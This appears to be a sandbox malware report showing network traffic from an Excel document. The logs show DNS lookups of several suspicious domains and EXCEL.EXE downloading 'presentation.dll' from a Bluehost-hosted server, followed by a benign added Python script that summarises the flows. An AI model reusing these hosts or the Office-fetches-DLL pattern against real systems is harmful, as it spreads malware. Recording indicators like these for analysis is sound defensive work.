                                                                                                                                                                            May 3, 2021 19:48:16.813623905 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813644886 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813663006 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813679934 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813700914 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813714981 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813747883 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813757896 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813791037 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813807964 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813828945 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813848019 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813868046 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813884020 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813908100 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813922882 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813946009 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.813961983 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.813983917 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814004898 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814022064 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814042091 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814069986 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814081907 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814112902 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814127922 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814151049 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814167023 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814189911 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814207077 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814229012 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814251900 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814266920 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814289093 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814306974 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814321041 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814343929 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814357996 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814390898 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814398050 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814435959 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814452887 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814475060 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814495087 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814503908 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814541101 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814558029 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:21.813452005 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:21.813596964 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:51.873781919 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.047764063 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.047817945 CEST4976480192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.172405958 CEST804976534.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.172455072 CEST804976434.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.172761917 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.173763037 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.173763037 CEST4976480192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.339246988 CEST804976534.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.929080009 CEST804976534.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.929781914 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.930757999 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:27.055741072 CEST804976534.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:28.084047079 CEST4976480192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.094882011 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.095599890 CEST4978080192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.219225883 CEST804977934.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:10.219353914 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.219878912 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.220418930 CEST804978034.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:10.220511913 CEST4978080192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.387370110 CEST804977934.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:10.962115049 CEST804977934.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:10.962344885 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.968224049 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:11.092386007 CEST804977934.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:12.009726048 CEST4978080192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.137907028 CEST4978180192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.138166904 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.264683008 CEST804978234.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:34.264905930 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.265055895 CEST804978134.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:34.265242100 CEST4978180192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.266048908 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.431782007 CEST804978234.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:35.009057999 CEST804978234.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:35.009167910 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:35.010200977 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:35.134429932 CEST804978234.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:36.055557013 CEST4978180192.168.2.434.86.224.8
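The packet listings above are one row per packet, which hides what an analyst actually wants: how many sessions the sample opened to each server, how long each lasted, and how lopsided the traffic was. The following is an added example, not part of the Joe Sandbox report or its tooling. It parses rows in the five-column layout used by these tables (Timestamp, Source Port, Dest Port, Source IP, Dest IP), folds both directions of a conversation into one flow record, and summarises per server. The sample input is a constructed subset of rows transcribed from the TCP and UDP tables above; the "# TCP" / "# UDP" marker lines are an assumption of this example, not something the report emits.

```python
"""Fold a Joe Sandbox style packet listing into per-flow and per-server summaries.

Added example, not part of the original report. Input rows look like:
  May 3, 2021 19:48:16.812822104 CEST  49740  80  192.168.2.4  162.241.24.47
with columns Timestamp / Source Port / Dest Port / Source IP / Dest IP.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample input: a subset of rows transcribed from the tables above.
# The "# TCP" / "# UDP" marker lines are this example's own convention.
SAMPLE_LISTING = """
# TCP
May 3, 2021 19:48:16.812822104 CEST  49740  80     192.168.2.4    162.241.24.47
May 3, 2021 19:48:16.812863111 CEST  80     49740  162.241.24.47  192.168.2.4
May 3, 2021 19:48:21.813452005 CEST  80     49740  162.241.24.47  192.168.2.4
May 3, 2021 19:48:51.873781919 CEST  80     49740  162.241.24.47  192.168.2.4
May 3, 2021 19:49:26.047764063 CEST  49765  80     192.168.2.4    34.86.224.8
May 3, 2021 19:49:26.172405958 CEST  80     49765  34.86.224.8    192.168.2.4
May 3, 2021 19:49:27.055741072 CEST  80     49765  34.86.224.8    192.168.2.4
May 3, 2021 19:50:10.094882011 CEST  49779  80     192.168.2.4    34.86.224.8
May 3, 2021 19:50:11.092386007 CEST  80     49779  34.86.224.8    192.168.2.4
# UDP
May 3, 2021 19:47:58.020844936 CEST  64646  53     192.168.2.4    8.8.8.8
May 3, 2021 19:47:58.072629929 CEST  53     64646  8.8.8.8        192.168.2.4
May 3, 2021 19:47:58.117489100 CEST  65298  53     192.168.2.4    8.8.8.8
May 3, 2021 19:47:58.195224047 CEST  53     65298  8.8.8.8        192.168.2.4
"""

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) (?P<tz>\S+)"
    r"\s+(?P<sport>\d+)\s+(?P<dport>\d+)\s+(?P<sip>[\d.]+)\s+(?P<dip>[\d.]+)$"
)


def parse_timestamp(base: str, frac: str) -> datetime:
    """The report prints nanoseconds; datetime holds microseconds, so truncate the fraction."""
    ts = datetime.strptime(base, "%b %d, %Y %H:%M:%S")
    return ts + timedelta(microseconds=int(frac[:6].ljust(6, "0")))


@dataclass
class Flow:
    proto: str
    client: tuple[str, int]   # side that sent the first packet present in the listing
    server: tuple[str, int]
    first: datetime
    last: datetime
    pkts_out: int = 0         # client -> server
    pkts_in: int = 0          # server -> client

    @property
    def duration(self) -> timedelta:
        return self.last - self.first


def parse_flows(listing: str) -> dict[tuple, Flow]:
    """Fold packet rows into flows; both directions of a conversation share one record."""
    flows: dict[tuple, Flow] = {}
    proto = "TCP"
    for raw in listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            proto = line.lstrip("# ").upper()
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unparseable row: {line!r}")
        ts = parse_timestamp(m["ts"], m["frac"])
        src = (m["sip"], int(m["sport"]))
        dst = (m["dip"], int(m["dport"]))
        # Canonical key: the sorted endpoint pair, so A->B and B->A map to the same flow.
        key = (proto,) + tuple(sorted([src, dst]))
        flow = flows.get(key)
        if flow is None:
            flow = flows[key] = Flow(proto, src, dst, ts, ts)
        flow.last = max(flow.last, ts)
        if src == flow.client:
            flow.pkts_out += 1
        else:
            flow.pkts_in += 1
    return flows


def summarise_servers(flows: dict[tuple, Flow]) -> dict[tuple, dict]:
    """Per (proto, server_ip, server_port): session count, packet totals, longest session."""
    out: dict[tuple, dict] = {}
    for f in flows.values():
        key = (f.proto, f.server[0], f.server[1])
        s = out.setdefault(key, {"sessions": 0, "pkts_out": 0, "pkts_in": 0, "longest_s": 0.0})
        s["sessions"] += 1
        s["pkts_out"] += f.pkts_out
        s["pkts_in"] += f.pkts_in
        s["longest_s"] = max(s["longest_s"], f.duration.total_seconds())
    return out


if __name__ == "__main__":
    for (proto, ip, port), s in sorted(summarise_servers(parse_flows(SAMPLE_LISTING)).items()):
        print(f"{proto} {ip}:{port:<5} sessions={s['sessions']} out={s['pkts_out']} "
              f"in={s['pkts_in']} longest={s['longest_s']:.1f}s")
```

On the full tables this separates the single long-lived session on port 49740 to 162.241.24.47:80 (packets spread from 19:48:16 to 19:48:51) from the short paired connections to 34.86.224.8:80 and the one-query-one-answer DNS exchanges with 8.8.8.8. Treating the first packet seen as the initiator is a heuristic that is only as good as the capture; a listing that starts mid-session, as the TCP table here does, can mislabel client and server, so check the first row of any flow you rely on.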

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
May 3, 2021 19:47:58.020844936 CEST  64646        53         192.168.2.4    8.8.8.8
May 3, 2021 19:47:58.072629929 CEST  53           64646      8.8.8.8        192.168.2.4
May 3, 2021 19:47:58.117489100 CEST  65298        53         192.168.2.4    8.8.8.8
May 3, 2021 19:47:58.195224047 CEST  53           65298      8.8.8.8        192.168.2.4
May 3, 2021 19:47:59.453775883 CEST  65298        53         192.168.2.4    8.8.8.8
May 3, 2021 19:47:59.511570930 CEST  53           65298      8.8.8.8        192.168.2.4
May 3, 2021 19:47:59.682372093 CEST  59123        53         192.168.2.4    8.8.8.8
May 3, 2021 19:47:59.734302044 CEST  53           59123      8.8.8.8        192.168.2.4
May 3, 2021 19:47:59.765811920 CEST  54531        53         192.168.2.4    8.8.8.8
May 3, 2021 19:47:59.814438105 CEST  53           54531      8.8.8.8        192.168.2.4
May 3, 2021 19:48:00.753032923 CEST  49714        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:00.801937103 CEST  53           49714      8.8.8.8        192.168.2.4
May 3, 2021 19:48:01.510534048 CEST  58028        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:01.569550037 CEST  53           58028      8.8.8.8        192.168.2.4
May 3, 2021 19:48:02.537785053 CEST  53097        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:02.588073015 CEST  53           53097      8.8.8.8        192.168.2.4
May 3, 2021 19:48:03.540112972 CEST  49257        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:03.589113951 CEST  53           49257      8.8.8.8        192.168.2.4
May 3, 2021 19:48:04.799597979 CEST  62389        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:04.858560085 CEST  53           62389      8.8.8.8        192.168.2.4
May 3, 2021 19:48:06.981548071 CEST  49910        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:07.033443928 CEST  53           49910      8.8.8.8        192.168.2.4
May 3, 2021 19:48:09.547194004 CEST  55854        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:09.600395918 CEST  53           55854      8.8.8.8        192.168.2.4
May 3, 2021 19:48:10.447953939 CEST  64549        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:10.496746063 CEST  53           64549      8.8.8.8        192.168.2.4
May 3, 2021 19:48:10.745537043 CEST  63153        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:10.819489002 CEST  53           63153      8.8.8.8        192.168.2.4
May 3, 2021 19:48:11.303186893 CEST  52991        53         192.168.2.4    8.8.8.8
May 3, 2021 19:48:11.382322073 CEST  53           52991      8.8.8.8        192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:11.743668079 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:11.800832987 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:12.310800076 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:12.384352922 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:13.346000910 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:13.406004906 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:14.271812916 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:14.323384047 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:15.361022949 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:15.421334028 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:15.532649994 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:15.589939117 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:15.659585953 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:15.717000008 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.480113029 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:16.540180922 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:17.712814093 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:17.761617899 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:18.549732924 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:18.598401070 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:19.378334999 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:19.431777000 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:22.490780115 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:22.539602995 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:23.475693941 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:23.526113987 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:24.371949911 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:24.429546118 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:25.530097008 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:25.581655025 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:26.550929070 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:26.602658987 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:27.394934893 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:27.443691015 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:28.273298025 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:28.322206020 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:33.605958939 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:33.655102968 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:35.654012918 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:35.715250015 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:53.880641937 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:53.948237896 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:54.745251894 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:54.804958105 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:07.573806047 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:07.623661041 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:09.973408937 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:10.031073093 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:15.541081905 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:15.599922895 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:24.242067099 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:24.303713083 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:25.680222034 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:26.036195993 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:31.493801117 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:31.602425098 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:32.183551073 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:32.283015966 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:32.868941069 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:32.925901890 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:33.426692009 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:33.446129084 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:33.492338896 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:33.563680887 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:34.139262915 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:34.356014013 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:35.054305077 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:35.116791964 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:35.808538914 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:35.874460936 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:36.826643944 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:36.875463009 CEST53509048.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:37.749708891 CEST5752553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:37.806780100 CEST53575258.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:38.293924093 CEST5381453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:38.343143940 CEST53538148.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:47.344005108 CEST5341853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:47.392643929 CEST53534188.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:48.542215109 CEST6283353192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:48.599294901 CEST53628338.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:54.223151922 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:54.280756950 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:55.230763912 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:55.279725075 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:56.229562998 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:56.278135061 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:58.241703033 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:58.290160894 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:02.242307901 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:02.299491882 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:08.758569956 CEST4994453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:08.816771984 CEST53499448.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:09.725045919 CEST6330053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:10.070560932 CEST53633008.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:32.552212954 CEST6144953192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:32.614394903 CEST53614498.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:33.747190952 CEST5127553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:34.115576029 CEST53512758.8.8.8192.168.2.4

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
May 3, 2021 19:47:59.511733055 CEST | 192.168.2.4 | 8.8.8.8 | d0e8 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 3, 2021 19:48:15.659585953 CEST | 192.168.2.4 | 8.8.8.8 | 0x2fc0 | Standard query (0) | docs.atu.ngr.mybluehost.me | A (IP address) | IN (0x0001)
May 3, 2021 19:49:25.680222034 CEST | 192.168.2.4 | 8.8.8.8 | 0xb4e6 | Standard query (0) | app.buboleinov.com | A (IP address) | IN (0x0001)
May 3, 2021 19:50:09.725045919 CEST | 192.168.2.4 | 8.8.8.8 | 0x4f0f | Standard query (0) | chat.billionady.com | A (IP address) | IN (0x0001)
May 3, 2021 19:50:33.747190952 CEST | 192.168.2.4 | 8.8.8.8 | 0xf1cf | Standard query (0) | app3.maintorna.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 3, 2021 19:48:15.717000008 CEST | 8.8.8.8 | 192.168.2.4 | 0x2fc0 | No error (0) | docs.atu.ngr.mybluehost.me | | 162.241.24.47 | A (IP address) | IN (0x0001)
May 3, 2021 19:49:26.036195993 CEST | 8.8.8.8 | 192.168.2.4 | 0xb4e6 | No error (0) | app.buboleinov.com | | 34.86.224.8 | A (IP address) | IN (0x0001)
May 3, 2021 19:50:10.070560932 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f0f | No error (0) | chat.billionady.com | | 34.86.224.8 | A (IP address) | IN (0x0001)
May 3, 2021 19:50:34.115576029 CEST | 8.8.8.8 | 192.168.2.4 | 0xf1cf | No error (0) | app3.maintorna.com | | 34.86.224.8 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• docs.atu.ngr.mybluehost.me
• app.buboleinov.com
• chat.billionady.com
• app3.maintorna.com

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.449740162.241.24.4780C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            May 3, 2021 19:48:15.894133091 CEST1234OUTGET /presentation.dll HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                            Host: docs.atu.ngr.mybluehost.me
                                                                                                                                                                            Connection: Keep-Alive
May 3, 2021 19:48:16.084395885 CEST | 1321 | IN | HTTP/1.1 200 OK
Date: Mon, 03 May 2021 17:48:15 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Mon, 03 May 2021 13:17:32 GMT
Accept-Ranges: bytes
Content-Length: 312832
Cache-Control: max-age=10800
Expires: Mon, 03 May 2021 20:48:15 GMT
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
X-Endurance-Cache-Level: 2
Keep-Alive: timeout=5, max=75
Content-Type: application/x-msdownload
